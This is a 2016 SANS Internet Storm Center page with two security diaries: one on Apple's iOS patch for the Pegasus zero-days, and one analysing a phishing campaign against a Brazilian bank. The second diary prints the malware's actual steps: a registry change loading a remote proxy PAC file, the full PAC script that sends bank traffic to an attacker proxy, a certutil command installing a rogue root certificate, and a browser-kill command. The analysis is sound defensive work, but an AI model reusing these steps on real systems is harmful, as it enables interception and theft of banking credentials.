Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Last Daily Podcast (Thu, Aug 25th):#Juniper/#Cisco Updates Regarding #NSA exploit;

Latest Diaries

Out-of-Band iOS Patch Fixes 0-Day Vulnerabilities

Published: 2016-08-25
Last Updated: 2016-08-25 20:01:12 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

A new spyware has been discovered on the Apple platform. Called Pegasus [1], it turns out to be a sophisticated targeted spyware. Developed by professionals, it uses 0-day vulnerabilities, code obfuscation and encryption techniques.

Apple released today an out-of-band patch for iOS (version 9.3.5) [2]. It fixes three critical vulnerabilities:

CVE-2016-4655 (Memory Corruption in Safari Webkit)
A memory corruption vulnerability exists in Safari Webkit that allows an attacker to execute arbitrary code. Pegasus exploits this vulnerability to obtain initial code execution privileges within the context of the Safari web browser.

CVE-2016-4656 (Kernel Information Leak Circumvents KASLR) 
Before Pegasus can execute its jailbreak, it must determine where the kernel is located in memory. Kernel Address Space Layout Randomization (KASLR) makes this task difficult by  mapping the kernel into different and unpredictable locations in memory. 

CVE-2016-4657 (Memory Corruption in Kernel leads to Jailbreak)
The third vulnerability in Pegasus’ Trident is the one that is used to jailbreak the phone. A memory corruption vulnerability in the kernel is used to corrupt memory in both the 32- and 64-bit versions. The exploits are performed differently on each version.

Check on the Apple website if the patch is available for your device and install it as soon as possible (via the usual way: iTunes or Software Updates on your device)

[1] https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf
[2] https://support.apple.com/en-us/HT207107

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 comment(s)

Example of Targeted Attack Through a Proxy PAC File

Published: 2016-08-24
Last Updated: 2016-08-25 05:54:18 UTC
by Xavier Mertens (Version: 1)
3 comment(s)

Yesterday, I discovered a nice example of targeted attack against a Brazilian bank. It started with an email sample like this:

This message was sent to a Brazilian citizen. Redacted in Portuguese, it could be approximately translated with the help of Google to: "Please find attached the pay slip of Augustus 2016 which expires on Monday 29/08/2016...".

The picture is a link to a RAR file "visualizar_imprimir.rar" (MD5: c2781a11e7de53cc0ddb2161628454cb) which contains a malicious PE file "visualizar_imprimir.exe" (MD5: c5e9014a82a889dcf2c5fd66ba5f1dca). This file had a VT score of 0/55 [1] when I scanned it for the first time (24/08/2016 12:09 UTC). [Update: this morning, the score is 1/55 - Kasperski reports it as malicious]

The malware is quite simple. First, it changes the Internet settings by modifying the following registry key for the current user:

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

Note: files from 0.png to 9.png are available and they have the same content.

This registry key will force the browser to fetch the file and apply the new settings. Indeed, the file "1.png" is not a picture but a rogue PAC[2] file that contains a filter for only one URL: the Brazilian bank website. Here is a dump of the PAC file:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

The IP address is located in Brazil [3].

The next step performed by the malware is to install a rogue root CA certificate to prevent all annoying pop-ups for the user when he will visit the bank website:

cmd /C certutil -addstore -user root %USERPROFILE%\AppData\Roaming\1.cer

Finally, all running browsers are killed (in the hard way!) to force a reload of its configuration. Note that when I performed my analysis, only Chrome was killed. I presume that the malware searches for running browsers and only kill them if found.

taskkill /F /IM “chrome.exe"

From now, if the victim visits "www.san*ander.com.br*", his/her browser will forward all requests to the rogue proxy server running on 200.98.202.51:1023 otherwise it will fetch all other URLs directly. I tested the proxy (a Squid/3.3.8) with other URLs and I always got a permission denied. Normal behavior or configuration error? I don't know.

If you configure manually your browser with the IP address and port above as a proxy and you try to access www.santander.com.be, you will be presented with the rogue SSL certificate:

Here is the good one (issued by GeoTrust):

As you can see with this example, it is quite easy to hijack the traffic from specific websites. With this technique, no need to use a complex exploit or to try to break the encryption. Just change the browser behavior and you will get a copy of all the victim's traffic.

Stay safe!

[1] https://www.virustotal.com/en/file/cccbd8a8d485d386486cf790ada90415ac71ef7e637e7abcc4d39bf443d7b4fe/analysis/1472040570/
[2] https://en.wikipedia.org/wiki/Proxy_auto-config
[3] 200.98.202.51

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Example of Targeted Attack Through a Proxy PAC File
16 hours ago by Xme (3 comments)

New VMware Patches VMSA-2016-0009.4 VMSA-2016-0013 http://www.vmware.com/security/advisories.html
1 day ago by Tom (0 comments)

Stay on Track During IR
1 day ago by Tom (1 comment)

Voice Message Notifications Deliver Ransomware
2 days ago by Xme (5 comments)

Red Team Tools Updates: hashcat and SpiderFoot
3 days ago by Russ McRee (0 comments)

Cisco ASA SNMP Remote Code Execution Vulnerability
4 days ago by Rick (1 comment)

What are YOU doing to give back to the security community?
4 days ago by Russell (6 comments)

Data Classification For the Masses
6 days ago by Xme (14 comments)

1 compromised site - 2 campaigns
1 week ago by Brad (0 comments)

View All Diaries →

Latest Discussions

New telnet attack? command injection against telnet...
created 1 day ago by EricWedaa (2 replies)

SWIFT frauds
created 1 day ago by RAJASEKHARAN (0 replies)

IS Audit of DC and DR
created 1 day ago by RAJASEKHARAN (0 replies)

Unix/Linux servers
created 1 day ago by RAJASEKHARAN (0 replies)

AliExpress being used as C&C for DoS?
created 6 days ago by Anonymous (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Critical Cisco ASA IKEv1/v2 Vulnerability. Active Scanning Detected
6 months ago by Dr. J. (25 comments)

Data Classification For the Masses
6 days ago by Xme (14 comments)

An Approach to Vulnerability Management
2 months ago by Russell (13 comments)

Using File Entropy to Identify "Ransomwared" Files
2 weeks ago by Rob VandenBrink (2 comments)

Profiling SSL Clients with tshark
2 weeks ago by Dr. J. (2 comments)